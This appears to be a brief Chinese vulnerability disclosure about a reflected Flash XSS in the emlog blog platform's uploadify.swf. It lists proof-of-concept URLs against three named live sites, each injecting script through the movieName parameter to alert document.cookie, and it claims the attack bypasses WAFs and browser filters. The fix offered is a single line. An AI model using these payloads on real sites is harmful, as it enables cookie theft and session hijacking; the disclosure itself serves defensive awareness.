emlog博客前台反射型XSS(无视浏览器filter) – 网站安

官方主机站测试一下：

http://host.emlog.net/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

开发者之一奇遇的博客：

http://blog.qiyuuu.com/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

思想之地：

http://be-evil.org/include/lib/js/uploadify/uploadify.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}//

等等我就不多列举了。

因为是flash xss，所以无视服务端WAF，无视浏览器filter~

关于这个swf我就不想多说了，老问题。

修复方案：

修复swf